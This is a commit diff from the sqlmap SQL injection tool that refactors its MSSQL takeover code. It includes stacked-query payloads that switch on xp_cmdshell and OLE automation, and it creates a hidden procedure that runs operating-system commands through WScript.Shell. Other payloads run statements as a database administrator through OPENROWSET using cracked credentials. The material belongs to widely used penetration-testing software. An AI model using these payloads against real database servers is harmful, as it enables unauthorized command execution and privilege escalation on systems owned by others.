more tweaking for issue sqlmapproject#34, it's totally not as trivial as it may look (OPENROWSET has many limitations on MSSQL >= 2005)

bdamele · bdamele · commit 04d803c7fd82 · 2012-07-02T15:02:00.000+01:00
diff --git a/lib/core/agent.py b/lib/core/agent.py
@@ -11,6 +11,7 @@
 
 from lib.core.common import Backend
 from lib.core.common import extractRegexResult
+from lib.core.common import getSPQLSnippet
 from lib.core.common import isDBMSVersionAtLeast
 from lib.core.common import isTechniqueAvailable
 from lib.core.common import randomInt
@@ -27,6 +28,7 @@
 from lib.core.settings import FROM_DUMMY_TABLE
 from lib.core.settings import GENERIC_SQL_COMMENT
 from lib.core.settings import PAYLOAD_DELIMITER
+from lib.core.settings import SQL_STATEMENTS
 from lib.core.unescaper import unescaper
 
 class Agent:
@@ -816,5 +818,20 @@ def replacePayload(self, inpStr, payload):
 
         return re.sub("(%s.*?%s)" % (PAYLOAD_DELIMITER, PAYLOAD_DELIMITER), "%s%s%s" % (PAYLOAD_DELIMITER, payload, PAYLOAD_DELIMITER), inpStr) if inpStr else inpStr
 
+    def runAsDBMSUser(self, query):
+        if conf.dCred and "Ad Hoc Distributed Queries" not in query:
+            for sqlTitle, sqlStatements in SQL_STATEMENTS.items():
+                for sqlStatement in sqlStatements:
+                    if query.lower().startswith(sqlStatement):
+                        sqlType = sqlTitle
+                        break
+
+            if sqlType and "SELECT" not in sqlType:
+                query = "SELECT %d;%s" % (randomInt(), query)
+
+            query = getSPQLSnippet(DBMS.MSSQL, "run_statement_as_user", USER=conf.dbmsUsername, PASSWORD=conf.dbmsPassword, STATEMENT=query.replace("'", "''"))
+
+        return query
+
 # SQL agent
 agent = Agent()
diff --git a/lib/takeover/abstraction.py b/lib/takeover/abstraction.py
@@ -10,13 +10,13 @@
 from lib.core.common import Backend
 from lib.core.common import getSPQLSnippet
 from lib.core.common import isTechniqueAvailable
+from lib.core.common import randomInt
 from lib.core.common import readInput
 from lib.core.data import conf
 from lib.core.data import logger
 from lib.core.enums import DBMS
 from lib.core.enums import PAYLOAD
 from lib.core.exception import sqlmapUnsupportedFeatureException
-from lib.core.settings import SQL_STATEMENTS
 from lib.core.shell import autoCompletion
 from lib.request import inject
 from lib.takeover.udf import UDF
@@ -38,21 +38,6 @@ def __init__(self):
         Web.__init__(self)
         xp_cmdshell.__init__(self)
 
-    def runAsDBMSUser(self, query):
-        if conf.dCred:
-            for sqlTitle, sqlStatements in SQL_STATEMENTS.items():
-                for sqlStatement in sqlStatements:
-                    if query.lower().startswith(sqlStatement):
-                        sqlType = sqlTitle
-                        break
-
-            if sqlType and "SELECT" not in sqlType:
-                query = "SELECT 1;%s" % query
-
-            query = getSPQLSnippet(DBMS.MSSQL, "run_statement_as_user", USER=conf.dbmsUsername, PASSWORD=conf.dbmsPassword, STATEMENT=query.replace("'", "''"))
-
-        return query
-
     def execCmd(self, cmd, silent=False):
         if self.webBackdoorUrl and not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED):
             self.webBackdoorRunCmd(cmd)
@@ -201,6 +186,13 @@ def initEnv(self, mandatory=True, detailed=False, web=False):
             if mandatory and not self.isDba():
                 warnMsg = "the functionality requested might not work because "
                 warnMsg += "the session user is not a database administrator"
+
+                if not conf.dCred and Backend.getIdentifiedDbms() in ( DBMS.MSSQL, DBMS.PGSQL ):
+                    warnMsg += ". You can try to provide --dbms-cred switch "
+                    warnMsg += "to execute statements as a DBA user if you "
+                    warnMsg += "were able to extract and crack a DBA "
+                    warnMsg += "password by any mean"
+
                 logger.warn(warnMsg)
 
             if Backend.getIdentifiedDbms() in ( DBMS.MYSQL, DBMS.PGSQL ):
diff --git a/lib/takeover/xp_cmdshell.py b/lib/takeover/xp_cmdshell.py
@@ -5,6 +5,7 @@
 See the file 'doc/COPYING' for copying permission
 """
 
+from lib.core.agent import agent
 from lib.core.common import Backend
 from lib.core.common import getSPQLSnippet
 from lib.core.common import hashDBWrite
@@ -40,26 +41,28 @@ def __xpCmdshellCreate(self):
         if Backend.isVersionWithin(("2005", "2008")):
             logger.debug("activating sp_OACreate")
 
-            cmd += "EXEC master..sp_configure 'show advanced options', 1; "
-            cmd += "RECONFIGURE WITH OVERRIDE; "
-            cmd += "EXEC master..sp_configure 'ole automation procedures', 1; "
-            cmd += "RECONFIGURE WITH OVERRIDE; "
-            inject.goStacked(cmd)
+            cmd += "EXEC master..sp_configure 'show advanced options',1;"
+            cmd += "RECONFIGURE WITH OVERRIDE;"
+            cmd += "EXEC master..sp_configure 'ole automation procedures',1;"
+            cmd += "RECONFIGURE WITH OVERRIDE"
+            inject.goStacked(agent.runAsDBMSUser(cmd))
 
         self.__randStr = randomStr(lowercase=True)
+        self.__xpCmdshellNew = randomStr(lowercase=True)
+        self.xpCmdshellStr = "master..xp_%s" % self.__xpCmdshellNew
 
-        cmd += "DECLARE @%s nvarchar(999); " % self.__randStr
+        cmd = "DECLARE @%s nvarchar(999);" % self.__randStr
         cmd += "set @%s='" % self.__randStr
-        cmd += "CREATE PROCEDURE xp_cmdshell(@cmd varchar(255)) AS DECLARE @ID int "
-        cmd += "EXEC sp_OACreate ''WScript.Shell'', @ID OUT "
-        cmd += "EXEC sp_OAMethod @ID, ''Run'', Null, @cmd, 0, 1 "
-        cmd += "EXEC sp_OADestroy @ID'; "
-        cmd += "EXEC master..sp_executesql @%s;" % self.__randStr
+        cmd += "CREATE PROCEDURE xp_%s(@cmd varchar(255)) AS DECLARE @ID int " % self.__xpCmdshellNew
+        cmd += "EXEC sp_OACreate ''WScript.Shell'',@ID OUT "
+        cmd += "EXEC sp_OAMethod @ID,''Run'',Null,@cmd,0,1 "
+        cmd += "EXEC sp_OADestroy @ID';"
+        cmd += "EXEC master..sp_executesql @%s" % self.__randStr
 
         if Backend.isVersionWithin(("2005", "2008")):
-            cmd += " RECONFIGURE WITH OVERRIDE;"
+            cmd += ";RECONFIGURE WITH OVERRIDE"
 
-        inject.goStacked(cmd)
+        inject.goStacked(agent.runAsDBMSUser(cmd))
 
     def __xpCmdshellConfigure2005(self, mode):
         debugMsg = "configuring xp_cmdshell using sp_configure "
@@ -88,7 +91,7 @@ def __xpCmdshellConfigure(self, mode):
         else:
             cmd = self.__xpCmdshellConfigure2000(mode)
 
-        inject.goStacked(cmd)
+        inject.goStacked(agent.runAsDBMSUser(cmd))
 
     def __xpCmdshellCheck(self):
         cmd = "ping -n %d 127.0.0.1" % (conf.timeSec * 2)
@@ -153,7 +156,7 @@ def xpCmdshellForgeCmd(self, cmd):
         self.__forgedCmd += "SET @%s=%s;" % (self.__randStr, self.__cmd)
         self.__forgedCmd += "EXEC %s @%s" % (self.xpCmdshellStr, self.__randStr)
 
-        return self.runAsDBMSUser(self.__forgedCmd)
+        return agent.runAsDBMSUser(self.__forgedCmd)
 
     def xpCmdshellExecCmd(self, cmd, silent=False):
         cmd = self.xpCmdshellForgeCmd(cmd)
diff --git a/procs/mssqlserver/configure_openrowset.txt b/procs/mssqlserver/configure_openrowset.txt
@@ -3,4 +3,4 @@ RECONFIGURE WITH OVERRIDE;
 EXEC master..sp_configure 'Ad Hoc Distributed Queries', %ENABLE%;
 RECONFIGURE WITH OVERRIDE;
 EXEC sp_configure 'show advanced options', 0;
-RECONFIGURE WITH OVERRIDE;
+RECONFIGURE WITH OVERRIDE
diff --git a/procs/mssqlserver/configure_xp_cmdshell.txt b/procs/mssqlserver/configure_xp_cmdshell.txt
@@ -1,6 +1,6 @@
-EXEC master..sp_configure 'show advanced options', 1;
+EXEC master..sp_configure 'show advanced options',1;
 RECONFIGURE WITH OVERRIDE;
-EXEC master..sp_configure 'xp_cmdshell', %ENABLE%;
+EXEC master..sp_configure 'xp_cmdshell',%ENABLE%;
 RECONFIGURE WITH OVERRIDE;
-EXEC sp_configure 'show advanced options', 0;
-RECONFIGURE WITH OVERRIDE;
+EXEC sp_configure 'show advanced options',0;
+RECONFIGURE WITH OVERRIDE
diff --git a/procs/mssqlserver/disable_xp_cmdshell_2000.txt b/procs/mssqlserver/disable_xp_cmdshell_2000.txt
@@ -1 +1 @@
-EXEC master..sp_dropextendedproc 'xp_cmdshell';
+EXEC master..sp_dropextendedproc 'xp_cmdshell'
diff --git a/procs/mssqlserver/enable_xp_cmdshell_2000.txt b/procs/mssqlserver/enable_xp_cmdshell_2000.txt
@@ -1 +1 @@
-EXEC master..sp_addextendedproc 'xp_cmdshell', @dllname='xplog70.dll';
+EXEC master..sp_addextendedproc 'xp_cmdshell', @dllname='xplog70.dll'
diff --git a/procs/mssqlserver/run_statement_as_user.txt b/procs/mssqlserver/run_statement_as_user.txt
@@ -1 +1,2 @@
-SELECT * FROM OPENROWSET('SQLOLEDB','';'%USER%';'%PASSWORD%','%STATEMENT%');
+SELECT * FROM OPENROWSET('SQLOLEDB','';'%USER%';'%PASSWORD%','%STATEMENT%')
+# SELECT * FROM OPENROWSET('SQLOLEDB','Network=DBMSSOCN;Address=;uid=%USER%;pwd=%PASSWORD%','%STATEMENT%')

Original file line number	Diff line number	Diff line change
`@@ -1 +1 @@`
`1`		`-EXEC master..sp_dropextendedproc 'xp_cmdshell';`
	`1`	`+EXEC master..sp_dropextendedproc 'xp_cmdshell'`
Original file line number	Diff line number	Diff line change
`@@ -1 +1 @@`
`1`		`-EXEC master..sp_addextendedproc 'xp_cmdshell', @dllname='xplog70.dll';`
	`1`	`+EXEC master..sp_addextendedproc 'xp_cmdshell', @dllname='xplog70.dll'`
Original file line number	Diff line number	Diff line change
`@@ -1 +1,2 @@`
`1`		`-SELECT * FROM OPENROWSET('SQLOLEDB','';'%USER%';'%PASSWORD%','%STATEMENT%');`
	`1`	`+SELECT * FROM OPENROWSET('SQLOLEDB','';'%USER%';'%PASSWORD%','%STATEMENT%')`
	`2`	`+# SELECT * FROM OPENROWSET('SQLOLEDB','Network=DBMSSOCN;Address=;uid=%USER%;pwd=%PASSWORD%','%STATEMENT%')`